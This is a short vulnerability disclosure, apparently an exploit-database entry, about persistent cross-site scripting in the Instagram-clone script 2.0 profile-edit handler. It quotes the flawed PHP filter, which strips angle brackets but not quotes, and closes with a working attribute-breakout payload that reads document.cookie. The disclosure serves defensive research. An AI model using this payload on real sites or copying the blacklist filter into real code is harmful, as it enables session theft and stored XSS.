# Exploit Title: Instagram-clone script 2.0 - Persistent cross site scripting
# Date: 2018-07-08
# Exploit Author: L0RD
# Email: borna.nematzadeh123@gmail.com
# Software Link: https://github.com/yTakkar/Instagram-clone/archive/master.zip
# Vendor Homepage: https://github.com/yTakkar/Instagram-clone
# Version: 2.0
# Tested on: Kali linux
=================================================
# POC : Persistent Cross site scripting
# vulnerable file : edit_requests.php
# vulnerable code :
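if (isset($_POST['username'])) {
    // Profile-edit handler: filters the submitted fields, persists them via
    // $edit->saveProfileEditing() and answers with a JSON status message.
    //
    // NOTE(review): the preg_replace() patterns below are a character blacklist,
    // not an encoder. They drop "<" and ">" (and, for the name fields, spaces)
    // but leave quotes alone, so a stored value can still terminate an HTML
    // attribute and add an event handler when it is rendered unescaped.
    // Filtering on input cannot fix that; every place these fields are printed
    // must apply contextual output encoding, e.g.
    // htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8').
    // The patterns are retained unchanged so stored values stay the same.

    // Reads one POST field and applies the given filter. A missing field is
    // treated as "" instead of handing null to preg_replace(); an array-valued
    // field (name[]=...) is not a valid profile value and is also treated as "".
    $field = function ($key, $pattern, $replacement = '') {
        $value = isset($_POST[$key]) ? $_POST[$key] : '';
        if (!is_string($value)) {
            $value = '';
        }
        return preg_replace($pattern, $replacement, $value);
    };

    $username  = $field('username', "#[<> ]#i");
    $firstname = $field('firstname', "#[<> ]#i");
    $surname   = $field('surname', "#[<> ]#i");
    $bio       = $field('bio', "#[<>]#i");
    $instagram = $field('instagram', "#[<>]#i");
    $youtube   = $field('youtube', "#[<>]#i");
    $facebook  = $field('facebook', "#[<>]#i");
    $twitter   = $field('twitter', "#[<>]#i");
    $website   = $field('website', "#[<>]#i");
    $mobile    = $field('mobile', "#[^0-9]#i");   // digits only
    $tags      = $field('tags', "#[\s]#", '-');   // whitespace -> "-"

    // Read exactly as before; it is not passed to saveProfileEditing() here, so
    // it may be consumed further down the script - verify before removing.
    $session = $_SESSION['id'];

    $m = $edit->saveProfileEditing(
        $username, $firstname, $surname, $bio, $instagram, $youtube,
        $facebook, $twitter, $website, $mobile, $tags
    );

    echo json_encode(['mssg' => $m]);
}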
# preg_replace() removes "<" and ">" (replaces them with an empty string) but leaves quotes untouched, so a value can still close the surrounding HTML attribute.
So we use this payload to bypass the filter:
# Payload : "onmouseover=" alert(document.cookie)
=================================================